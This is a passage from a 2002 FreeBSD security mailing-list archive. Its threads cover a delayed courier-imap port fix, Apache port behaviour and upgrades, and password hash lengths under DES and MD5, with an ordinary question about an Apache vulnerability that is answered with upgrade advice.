List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 20, 2002 at 02:36:23PM +0800, Jimmy wrote: > Hello, > > I received the security advisory, therefore, I cvsuped the src and > ports, but after cvsuping the ports I noticed that courier-imap is > not updated; > > PORTNAME= courier-imap > PORTVERSION= 1.4.3 > PORTREVISION= 0 > CATEGORIES= mail ipv6 > MASTER_SITES= ${MASTER_SITE_SOURCEFORGE} > MASTER_SITE_SUBDIR= courier > > Is there something wrong with my cvsup? No, there is something wrong with your Security Officer 8-) I apologize. I had forgotten that I was waiting for comments from the port maintainer before committing the fix. I went ahead and have now updated courier-imap to match the `facts' listed in FreeBSD-SN-02:04. Thanks for catching and reporting! Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 5:42:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from phoenix.tricom.com.ph (phoenix.tricom.com.ph [203.167.87.58]) by hub.freebsd.org (Postfix) with SMTP id 5528837B405 for ; Thu, 20 Jun 2002 05:42:06 -0700 (PDT) Received: (qmail 76277 invoked from network); 20 Jun 2002 12:40:58 -0000 Received: from unknown (HELO orion.tricom.com.ph) (203.167.87.59) by phoenix.tricom.com.ph with SMTP; 20 Jun 2002 12:40:58 -0000 Date: Thu, 20 Jun 2002 20:41:59 +0800 From: Jimmy To: "Jacques A. Vidrine" Cc: freebsd-security@freebsd.org, nbm@freebsd.org Subject: Re: FreeBSD Security Notice FreeBSD-SN-02:04 [courier-imap not updated] Message-Id: <20020620204159.1eb50ec6.jimmy@tricom.com.ph> In-Reply-To: <20020620122159.GB52793@madman.nectar.cc> References: <20020620143623.1a2565c4.jimmy@tricom.com.ph> <20020620122159.GB52793@madman.nectar.cc> Organization: Tricom X-Mailer: Sylpheed version 0.7.6 (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; boundary="lq=.YlwZkFnUBOWN" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --lq=.YlwZkFnUBOWN Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Thu, 20 Jun 2002 07:21:59 -0500 "Jacques A. Vidrine" wrote: > On Thu, Jun 20, 2002 at 02:36:23PM +0800, Jimmy wrote: > > Hello, > > > > I received the security advisory, therefore, I cvsuped the src and > > ports, but after cvsuping the ports I noticed that courier-imap is > > not updated; > > > > PORTNAME= courier-imap > > PORTVERSION= 1.4.3 > > PORTREVISION= 0 > > CATEGORIES= mail ipv6 > > MASTER_SITES= ${MASTER_SITE_SOURCEFORGE} > > MASTER_SITE_SUBDIR= courier > > > > Is there something wrong with my cvsup? > > No, there is something wrong with your Security Officer 8-) I > apologize. I had forgotten that I was waiting for comments from the > port maintainer before committing the fix. > > I went ahead and have now updated courier-imap to match the `facts' > listed in FreeBSD-SN-02:04. > > Thanks for catching and reporting! > > Cheers, > -- > Jacques A. Vidrine http://www.nectar.cc/ > NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos > jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se Your welcome, thanks anyway. regards, -- Jimmy Lim Operation & Support Team Leader IT Department Tricom --lq=.YlwZkFnUBOWN Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Ec2ZIr5NBZzlYgARAkiFAKDNm/P8nKAVgwXA2+Rs72BtLjU/CACgohkF nvK3GR/H5ljSvekai39BXg4= =3xoz -----END PGP SIGNATURE----- --lq=.YlwZkFnUBOWN-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 5:46:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from infinitive.futureperfectcorporation.com (infinitive.futureperfectcorporation.com [196.25.137.68]) by hub.freebsd.org (Postfix) with SMTP id 5A24537B40B for ; Thu, 20 Jun 2002 05:46:09 -0700 (PDT) Received: (qmail 11082 invoked by uid 0); 20 Jun 2002 12:46:05 -0000 Received: from gerund.futureperfectcorporation.com (196.25.137.65) by infinitive.futureperfectcorporation.com with SMTP; 20 Jun 2002 12:46:05 -0000 Received: (qmail 15831 invoked by uid 1001); 20 Jun 2002 12:46:31 -0000 Date: Thu, 20 Jun 2002 14:46:30 +0200 From: Neil Blakey-Milner To: Sheldon Hearn Cc: Mark Thomas , freebsd-ports@FreeBSD.ORG, ache@FreeBSD.org Subject: Re: Apache 1.3.26 port Message-ID: <20020620124630.GC15674@mithrandr.moria.org> References: <200206200658470001.031DD337@mail.speakeasy.net> <200206200658470001.031DD337@mail.speakeasy.net> <5.1.0.14.2.20020620073651.02008090@pbegames.com> <20020620115347.GC73571@starjuice.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020620115347.GC73571@starjuice.net> User-Agent: Mutt/1.3.27i Organization: iTouch Labs X-Operating-System: FreeBSD 4.3-RELEASE i386 X-URL: http://mithrandr.moria.org/nbm/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu 2002-06-20 (13:53), Sheldon Hearn wrote: > The symlinks aren't created if the cgi-bin and data directories already > exist. They're only created so that a default installation of Apache > "works", in that http://localhost/ shows a page. If you already have > cgi-bin and data directories, the port leaves them alone. > So basically, folks who have their web content blown away by the port or > package have fallen victim to a process that's actually intended to make > things safe. > > What was never considered was that people would leave the symlinks in > place. [ security -> ports ] It also removes all the contents of data.default not installed by apache, such as those installed by phpMyAdmin, phpPgAdmin, sqwebmail, qmailadmin, and so forth. I see no obvious reason the port should behave differently than all other ports in this regard - only remove it if you install it. This hasn't really affected me, except that it breaks my phpMyAdmin.... ports. So I just reinstall. But it's irritating. Anyone have any good reason we should not just remove that change? Andrey, any thoughts? Neil -- Neil Blakey-Milner nbm@mithrandr.moria.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 6:46:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id E22E937B40C for ; Thu, 20 Jun 2002 06:46:30 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5KDg09g051496; Thu, 20 Jun 2002 09:42:01 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Dag-Erling Smorgrav'" Cc: "'Ryan Thompson'" , "'Bill Moran'" , Subject: RE: Password security Date: Thu, 20 Jun 2002 08:46:25 -0500 Message-ID: <001401c21860$e02392f0$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, have you changed the hash from DES to something different? If not, you're still dealing with an 8 character limit. Certainly the length at this point could be considered arbitrary, but only the first 8 characters count. Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: des@flood.ping.uio.no [mailto:des@flood.ping.uio.no] On Behalf Of Dag-Erling Smorgrav Sent: Thursday, June 20, 2002 3:45 AM To: Eric F Crist Cc: 'Ryan Thompson'; 'Bill Moran'; freebsd-security@FreeBSD.ORG Subject: Re: Password security "Eric F Crist" writes: > What I failed to point out was that, if you're using FreeBSD, which I > assume you as you're posting to this group, the FreeBSD login utility > still only recognizes 8 character passwords, unless you've changed that. Wrong. The 8-character limit was imposed by the traditional DES-based password hashing algorithm, not by login(1). By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 7:24:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 4E02B37B407 for ; Thu, 20 Jun 2002 07:24:33 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id F1E9B5361; Thu, 20 Jun 2002 16:24:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Eric F Crist" Cc: "'Ryan Thompson'" , "'Bill Moran'" , Subject: Re: Password security References: <001401c21860$e02392f0$77fe180c@armageddon> From: Dag-Erling Smorgrav Date: 20 Jun 2002 16:24:30 +0200 In-Reply-To: <001401c21860$e02392f0$77fe180c@armageddon> Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Eric F Crist" writes: > So, have you changed the hash from DES to something different? If not, > you're still dealing with an 8 character limit. Certainly the length at > this point could be considered arbitrary, but only the first 8 > characters count. To repeat what I wrote in my previous mail: "By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length." DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 7:47:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail1.qc.uunet.ca (mail1.qc.uunet.ca [198.168.54.16]) by hub.freebsd.org (Postfix) with ESMTP id C173037B401 for ; Thu, 20 Jun 2002 07:47:44 -0700 (PDT) Received: from xtanbul ([216.94.147.34]) by mail1.qc.uunet.ca (8.10.2/8.10.2) with ESMTP id g5KElDN02574; Thu, 20 Jun 2002 10:47:14 -0400 Date: Thu, 20 Jun 2002 10:43:40 -0400 Subject: hash-password length relation (was: Password security) Content-Type: text/plain; charset=ISO-8859-1; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: "Eric F Crist" , "'Ryan Thompson'" , "'Bill Moran'" , To: Dag-Erling Smorgrav From: Antoine Beaupre In-Reply-To: Message-Id: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> Content-Transfer-Encoding: quoted-printable X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi. Spinning a bit off topic here, i was wondering.. Does the length of the encrypted password grow with the length of the=20 password? A. Le jeudi 20 juin 2002, =E0 10:24 AM, Dag-Erling Smorgrav a =E9crit : > > To repeat what I wrote in my previous mail: "By default, FreeBSD uses > an MD5-based hash, and supports passwords of arbitrary length." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 7:53:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (esplanaden.cybercity.dk [212.242.40.114]) by hub.freebsd.org (Postfix) with ESMTP id 040C237B400 for ; Thu, 20 Jun 2002 07:53:52 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5KEpiee005259; Thu, 20 Jun 2002 16:51:49 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Antoine Beaupre Cc: Dag-Erling Smorgrav , "Eric F Crist" , "'Ryan Thompson'" , "'Bill Moran'" , freebsd-security@FreeBSD.ORG Subject: Re: hash-password length relation (was: Password security) In-Reply-To: Your message of "Thu, 20 Jun 2002 10:43:40 EDT." <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> Date: Thu, 20 Jun 2002 16:51:44 +0200 Message-ID: <5258.1024584704@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>, Antoine Beaup re writes: >Hi. > >Spinning a bit off topic here, i was wondering.. > >Does the length of the encrypted password grow with the length of the >password? No. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 8: 1:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id AA43237B43A for ; Thu, 20 Jun 2002 08:00:27 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id B08195361; Thu, 20 Jun 2002 17:00:24 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Antoine Beaupre Cc: "Eric F Crist" , "'Ryan Thompson'" , "'Bill Moran'" , Subject: Re: hash-password length relation (was: Password security) References: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> From: Dag-Erling Smorgrav Date: 20 Jun 2002 17:00:23 +0200 In-Reply-To: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Antoine Beaupre writes: > Does the length of the encrypted password grow with the length of the > password? Traditional DES always produces a 13-byte hash (including the salt). MD5 produces a 31-byte hash (also including the salt). Blowfish produces a 32-byte hash with (IIRC) a variable-length salt of up to 16 bytes. Both MD5 and Blowfish use a special prefix to identify the hash algorithm used; it's usually three bytes long for MD5 and five or six bytes long for Blowfish. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 8: 2:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from cyclone.tornadogroup.com (cyclone.tornadogroup.com [212.172.155.83]) by hub.freebsd.org (Postfix) with ESMTP id 6749737B442 for ; Thu, 20 Jun 2002 08:01:25 -0700 (PDT) Received: from claudette.e1.tornadogroup.com (root@claudette.e1.tornadogroup.com [192.168.0.77]) by cyclone.tornadogroup.com (8.10.0.Beta10/8.10.0.Beta10) with ESMTP id g5KF1Hr16518; Thu, 20 Jun 2002 16:01:17 +0100 (BST) Received: from claudette.e1.tornadogroup.com (matthew@localhost [IPv6:::1]) by claudette.e1.tornadogroup.com (8.12.3/8.12.3) with ESMTP id g5KF1G1J089442; Thu, 20 Jun 2002 16:01:16 +0100 (BST) (envelope-from matthew.seaman@tornadogroup.com) Received: (from matthew@localhost) by claudette.e1.tornadogroup.com (8.12.3/8.12.3/Submit) id g5KF1B5p089441; Thu, 20 Jun 2002 16:01:11 +0100 (BST) (envelope-from matthew.seaman@tornadogroup.com) X-Authentication-Warning: claudette.e1.tornadogroup.com: matthew set sender to matthew.seaman@tornadogroup.com using -f Subject: Re: hash-password length relation (was: Password security) From: Matthew Seaman To: Antoine Beaupre Cc: Dag-Erling Smorgrav , Eric F Crist , "'Ryan Thompson'" , "'Bill Moran'" , freebsd-security@FreeBSD.ORG In-Reply-To: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> References: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 20 Jun 2002 16:01:11 +0100 Message-Id: <1024585271.61602.6.camel@claudette.e1.tornadogroup.com> Mime-Version: 1.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 2002-06-20 at 15:43, Antoine Beaupre wrote: > Does the length of the encrypted password grow with the length of the > password? claudette:~:% perl -e 'print crypt("a", "\$1\$xxxxxx"), "\n";' $1$xxxxxx$hklG2XADzlXp57Uqb/fBM0 claudette:~:% perl -e 'print crypt("a"x100, "\$1\$xxxxxx"), "\n";' $1$xxxxxx$tRvOgaXGQf37NFBo31ZVv1 No. Matthew -- Matthew Seaman 01628 498661 Scrutantibus gehennas parabat St Augustine To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 8: 7:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail1.qc.uunet.ca (mail1.qc.uunet.ca [198.168.54.16]) by hub.freebsd.org (Postfix) with ESMTP id 2E1F637B403 for ; Thu, 20 Jun 2002 08:07:50 -0700 (PDT) Received: from xtanbul ([216.94.147.34]) by mail1.qc.uunet.ca (8.10.2/8.10.2) with ESMTP id g5KF7TN03308; Thu, 20 Jun 2002 11:07:30 -0400 Date: Thu, 20 Jun 2002 11:03:57 -0400 Subject: Re: hash-password length relation (was: Password security) Content-Type: text/plain; charset=ISO-8859-1; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: "Eric F Crist" , "'Ryan Thompson'" , "'Bill Moran'" , To: Dag-Erling Smorgrav From: Antoine Beaupre In-Reply-To: Message-Id: Content-Transfer-Encoding: quoted-printable X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thank you everyone for such quick response. A. Le jeudi 20 juin 2002, =E0 11:00 AM, Dag-Erling Smorgrav a =E9crit : > Antoine Beaupre writes: >> Does the length of the encrypted password grow with the length of the >> password? > > Traditional DES always produces a 13-byte hash (including the salt). > MD5 produces a 31-byte hash (also including the salt). Blowfish > produces a 32-byte hash with (IIRC) a variable-length salt of up to 16 > bytes. Both MD5 and Blowfish use a special prefix to identify the > hash algorithm used; it's usually three bytes long for MD5 and five or > six bytes long for Blowfish. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 9:38:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 20F9B37B408 for ; Thu, 20 Jun 2002 09:38:40 -0700 (PDT) Received: from armageddon (12-24-254-119.man.mn.charter.com [12.24.254.119]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5KGYB9g052560; Thu, 20 Jun 2002 12:34:12 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'Dag-Erling Smorgrav'" Cc: "'Ryan Thompson'" , "'Bill Moran'" , Subject: RE: Password security Date: Thu, 20 Jun 2002 11:38:33 -0500 Message-ID: <001501c21878$ec7ecbb0$77fe180c@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org My bad, had a serious brain fart this morning. ;) Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: des@flood.ping.uio.no [mailto:des@flood.ping.uio.no] On Behalf Of Dag-Erling Smorgrav Sent: Thursday, June 20, 2002 9:25 AM To: Eric F Crist Cc: 'Ryan Thompson'; 'Bill Moran'; freebsd-security@FreeBSD.ORG Subject: Re: Password security "Eric F Crist" writes: > So, have you changed the hash from DES to something different? If not, > you're still dealing with an 8 character limit. Certainly the length at > this point could be considered arbitrary, but only the first 8 > characters count. To repeat what I wrote in my previous mail: "By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length." DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 9:56:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from java2.dpcsys.com (java2.dpcsys.com [206.16.184.5]) by hub.freebsd.org (Postfix) with ESMTP id 6EE7037B40B for ; Thu, 20 Jun 2002 09:56:46 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by java2.dpcsys.com (8.11.1/8.11.1) with ESMTP id g5KGt8C73515; Thu, 20 Jun 2002 09:55:08 -0700 (PDT) Date: Thu, 20 Jun 2002 09:55:08 -0700 (PDT) From: Dan Busarow To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port In-Reply-To: <4.3.2.7.2.20020619225221.023306b0@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Jun 19, Brett Glass wrote: > At 06:56 PM 6/19/2002, Mikel King wrote: > >Two suggestions from my own experience with working with Apache...kick the default conf and driectory tree to the curb. > > I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball, letting it use its default directory (/usr/local/apache2). It wouldn't run; it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types, even though that path was not in Apache's standard tree at all! Not sure what is going on here. Any ideas? Brett, I installed three copies of 2.0.39 yesterday. All worked fine. I did use the --prefix=/usr/local/apache2 arg to configure, maybe the default is broken? Dan -- Dan Busarow 949 443 4172 Dana Point Communications, Inc. dan@dpcsys.com Dana Point, California 83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 12:38:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from hellfire.hexdump.org (h006097e24f05.ne.client2.attbi.com [24.62.157.118]) by hub.freebsd.org (Postfix) with ESMTP id E95A637B400 for ; Thu, 20 Jun 2002 12:38:48 -0700 (PDT) Received: from hellfire.hexdump.org (localhost [127.0.0.1]) by hellfire.hexdump.org (8.12.2/8.12.2) with ESMTP id g5KJjx1T076831 for ; Thu, 20 Jun 2002 15:45:59 -0400 (EDT) (envelope-from freebsd@hexdump.org) Received: from localhost (freebsd@localhost) by hellfire.hexdump.org (8.12.2/8.12.2/Submit) with ESMTP id g5KJjwm6076828 for ; Thu, 20 Jun 2002 15:45:59 -0400 (EDT) Date: Thu, 20 Jun 2002 15:45:58 -0400 (EDT) From: Jeff Gentry To: freebsd-security@freebsd.org Subject: Apache root exploitable? In-Reply-To: Message-ID: <20020620154453.L76822-100000@hellfire.hexdump.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm a bit confused following all these messages, especially with that expoit script someone sent out "Apache exploitable?". Is this thing root exploitable? Reading the code sent out in the aforementioned thread it sounds as if it might be but I was not certain. Is there a workaround outside of closing off Apache? Thanks -J To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 12:40:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from ra.upan.org (ra.upan.org [204.107.76.19]) by hub.freebsd.org (Postfix) with ESMTP id 460DC37B405 for ; Thu, 20 Jun 2002 12:40:48 -0700 (PDT) Received: from ocsinternet.com ([10.0.0.140]) by ra.upan.org (8.12.3/8.11.6) with ESMTP id g5KJegEZ063417; Thu, 20 Jun 2002 15:40:42 -0400 (EDT) (envelope-from mikel@ocsinternet.com) Message-ID: <3D123DD0.1050005@ocsinternet.com> Date: Thu, 20 Jun 2002 15:40:48 -0500 From: Mikel King User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Brett Glass Cc: Bill Moran , jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com> <4.3.2.7.2.20020619225221.023306b0@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: >At 06:56 PM 6/19/2002, Mikel King wrote: > > > >>Two suggestions from my own experience with working with Apache...kick the default conf and driectory tree to the curb. >> >> > >I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball, letting it use its default directory (/usr/local/apache2). It wouldn't run; it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types, even though that path was not in Apache's standard tree at all! Not sure what is going on here. Any ideas? > >--Brett > > One guess is you might try building apache2 from the ports, and immediately followed by the tarball you downloaded. I know that doesn't solve the problem, but it may side step it for the time being... When I get a few spare minutes, I shall attempt to build it and see what's happening. -- Cheers, Mikel +------------------------------------------+ Ok I'll go fsck my brain for a while as it's been a rather long night. +------------------------------------------+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 12:42:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 0F33537B40F for ; Thu, 20 Jun 2002 12:41:45 -0700 (PDT) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g5KJfh104908; Thu, 20 Jun 2002 13:41:44 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id 8E88A23A7A; Thu, 20 Jun 2002 13:41:43 -0600 (MDT) Date: Thu, 20 Jun 2002 13:41:43 -0600 From: "David G . Andersen" To: Jeff Gentry Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache root exploitable? Message-ID: <20020620134143.C14099@cs.utah.edu> References: <20020620154453.L76822-100000@hellfire.hexdump.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20020620154453.L76822-100000@hellfire.hexdump.org>; from freebsd@hexdump.org on Thu, Jun 20, 2002 at 03:45:58PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jeff Gentry just mooed: > I'm a bit confused following all these messages, especially with that > expoit script someone sent out "Apache exploitable?". Is this thing root > exploitable? Reading the code sent out in the aforementioned thread it > sounds as if it might be but I was not certain. It's not _root_ exploitable unless you run Apache as root. If you do that, you're asking for it anyway. It may or may not be remotely exploitable. It looks a lot more exploitable than it did a few days ago. :) Regardless, you should: > Is there a workaround outside of closing off Apache? Upgrade to 1.3.26 or 2.0.39. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 13:15:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 58BA237B408 for ; Thu, 20 Jun 2002 13:15:11 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id B3192D; Thu, 20 Jun 2002 15:15:10 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5KKFAJI056321; 